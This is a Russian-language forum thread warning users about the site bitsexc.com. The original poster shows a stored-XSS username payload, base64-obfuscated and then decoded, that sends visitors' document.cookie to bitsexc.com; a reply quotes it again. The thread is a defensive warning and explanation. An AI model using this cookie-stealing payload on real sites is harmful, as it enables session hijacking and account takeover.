|
Title: Осторожно: хакерская биржа bitsexc.com Post by: kzv on August 01, 2018, 09:50:26 AM Хочу предостеречь новичков и не только от того, чтобы вводить какие-либо данные на сайте https://bitsexc.com/
Этот сайт принадлежит хакерам или контролируется ими! Обнаружил я это по тому, как на моем сайте зарегистрировался пользователь с интересным именем: Code: <code class="html"><script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw=='));</script></code>Странное имя для пользователя подумал я и попробовал расшифровать строчку "dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x 1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaG lsZChpbWcpOw==". К счастью для расшифровки достаточно скопастить ее например на этом сайте https://www.base64decode.net/ (пункт Base64 decode) Вот что там написано: Code: var img = new Image(0,0); img.src='https://bitsexc.com/includes/send.php?c=' + document.cookie; document.body.appendChild(img); Если внезапно не все владеют яваскриптом, то перевожу на русский: Хакер хотел чтобы все, кто заходит на страницу на которой показывается его имя пользователя, автоматически отправляли на сайт bitsexc.com данные о своей сессии-авторизаци. Дальще с этими данными хакер мог бы логиниться от имени других пользователей без пароля. Title: Re: Осторожно: хакерская биржа bitsexc.com Post by: DarkNightRider on August 01, 2018, 01:25:58 PM Строго говоря, так мог и не относящийся к бирже человек сделать. Чтобы подставить, например, добросовестных биржевиков :)
Title: Re: Осторожно: хакерская биржа bitsexc.com Post by: kzv on August 01, 2018, 03:04:32 PM Строго говоря, так мог и не относящийся к бирже человек сделать. Чтобы подставить, например, добросовестных биржевиков :) Это классика: я не я, мне подкинули, нет у вас методов против Кости Сопрыкина ) Title: Re: Осторожно: хакерская биржа bitsexc.com Post by: MisterPipka on August 01, 2018, 07:46:54 PM Спасибо за информацию.Не когда бы не подумал.А откуда у вас именно таккая информация.Так для себя ,что бы знать или может узнавать еще !
Title: Re: Осторожно: хакерская биржа bitsexc.com Post by: provalentine on August 02, 2018, 01:02:26 AM Спасибо за информацию.Не когда бы не подумал.А откуда у вас именно таккая информация.Так для себя ,что бы знать или может узнавать еще ! Видимо вам надо очки по почте выслать... Если и сейчас не поймете откуда ТС такую информацию раздобыл то вам пожалуй даже подорожник не поможет.Обнаружил я это по тому, как на моем сайте зарегистрировался пользователь с интересным именем: Code: <code class="html"><script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw=='));</script></code>Title: Re: Осторожно: хакерская биржа bitsexc.com Post by: Afony The Dilla on August 06, 2018, 01:55:34 PM хорошо видимо быть хакером
Title: Re: Осторожно: хакерская биржа bitsexc.com Post by: Crypto Sunchezz on August 28, 2018, 05:01:27 PM как распознать заранее что это хакерский сайт?
|